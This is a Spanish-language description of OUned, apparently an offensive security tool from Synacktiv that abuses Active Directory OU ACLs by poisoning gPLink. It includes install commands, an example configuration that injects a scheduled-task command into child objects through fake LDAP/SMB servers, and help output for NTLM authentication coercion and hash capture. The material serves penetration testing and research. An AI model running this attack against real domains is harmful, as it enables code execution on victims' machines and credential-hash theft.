
El proyecto OUned automatiza la explotación de las ACL de Unidades Organizativas de Active Directory mediante envenenamiento de gPLink.
El proyecto OUned, una herramienta de explotación que automatiza el abuso de las ACL de Unidades Organizativas mediante la manipulación de gPLink.
Para una explicación detallada sobre el principio en el que se basa el ataque, la configuración necesaria y el uso de la herramienta, puede consultar el artículo asociado: https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory
La instalación se puede realizar clonando el repositorio e instalando las dependencias:
$ git clone https://github.com/synacktiv/OUned
$ python3 -m pip install -r requirements.txt
Los argumentos de OUned se proporcionan a través de un archivo de configuración; en el repositorio se incluye un archivo de ejemplo, config.example.ini.
Cada entrada se describe mediante un comentario, pero para obtener instrucciones de configuración detalladas, consulte el artículo mencionado en la introducción.
[GENERAL]
# The target domain name
domain=corp.com
# The target DC. If not specified, defaults to the domain name
#dc=192.168.123.10
# The Distinguished Name of the target container
containerDN=OU=SERVERS,DC=corp,DC=com
# The username and password of the user having write permissions on the gPLink attribute of the target container
username=naugustine
password=Password1
# The IP address of the attacker machine on the internal network
attacker_ip=192.168.123.16
# The command that should be executed by child objects. Specifying a command will inject an immediate Scheduled Task
command=whoami > C:\poc.txt
# Alternatively to the 'command' option, you can provide a module file with the GroupPolicyBackdoor syntax - see https://github.com/synacktiv/GroupPolicyBackdoor/wiki. 'Command' and 'module' are mutually exclusive
# module=Scheduledtask_add_computer.ini
# The kind of objects targeted ("computer" or "user")
target_type=computer
[LDAP]
# The IP address of the dummy domain controller that will act as an LDAP server
ldap_ip=192.168.125.245
# Optional (used for sanity checks) - the hostname of the dummy domain controller
ldap_hostname=WIN-TTEBC5VH747
# The username and password of a domain administrator on the dummy domain controller
ldap_username=ldapadm
ldap_password=Password1!
# The ID of the GPO (can be empty, only needs to exist) on the dummy domain controller
gpo_id=7B7D6B23-26F8-4E4B-AF23-F9B9005167F6
# The machine account name and password on the target domain that will be used to fake the LDAP server delivering the GPC
ldap_machine_name=OUNED$
ldap_machine_password=some_very_long_random_password
[SMB]
# The SMB mode can be embedded or forwarded depending on the kind of object targeted
smb_mode=embedded
# The name of the SMB share. Can be anything for embedded mode, should match an existing share on SMB dummy domain controller for forwarded mode
share_name=synacktiv
# The IP address of the dummy domain controller that will act as a SMB server. Only useful in forwarded mode
#smb_ip=192.168.126.206
# The username and password of a user having write access to the share on the SMB dummy domain controller. Only useful in forwarded mode
#smb_username=smbadm
#smb_password=Password1!
# The machine account name and password on the target domain that will be used to fake the SMB server delivering the GPT. Only useful in forwarded mode
#smb_machine_name=OUNED2$
#smb_machine_password=some_very_long_random_password
El único argumento obligatorio al ejecutar OUned es la opción --config, que indica la ruta al archivo de configuración.
Las opciones --just-coerce y coerce-to se utilizan para el modo de coerción de autenticación SMB, en el que OUned fuerza la autenticación SMB de los objetos secundarios de la OU hacia el destino especificado. Para más detalles, consulte el artículo enlazado en la introducción.
En cuanto a la opción --just-clean, consulte la siguiente sección.
python3 OUned.py --help
Usage: OUned.py [OPTIONS]
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ * --config TEXT The configuration file for OUned [default: None] [required] │
│ --skip-checks Do not perform the various checks related to the exploitation setup │
│ --just-coerce Only coerce SMB NTLM authentication of OU child objects to the destination specified in the --coerce-to flag, or, if no destination is │
│ specified, to a local SMB server that will print their NetNTLMv2 hashes │
│ --coerce-to TEXT Coerce child objects SMB NTLM authentication to a specific destination - this argument should be an IP address [default: None] │
│ --just-clean This flag indicates that OUned should only perform cleaning actions from specified cleaning-file │
│ --cleaning-file TEXT The path to the cleaning file in case the --just-clean flag is used [default: None] │
│ --verbose Enable verbose output │
│ --help Show this message and exit. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
De forma predeterminada y como se explica en el artículo, OUned realiza acciones de limpieza y, entre otras, restaura el valor original de gPLink en el dominio de destino. En caso de que el exploit no pueda finalizar correctamente, OUned crea un archivo de limpieza cada vez que se ejecuta el exploit, que puede utilizarse posteriormente para restaurar los valores legítimos mediante la opción --just-clean; por ejemplo:
$ python3 OUned.py --config config.example.ini --just-clean --cleaning-file cleaning/FINANCE/2024_04_14-05_02_46.txt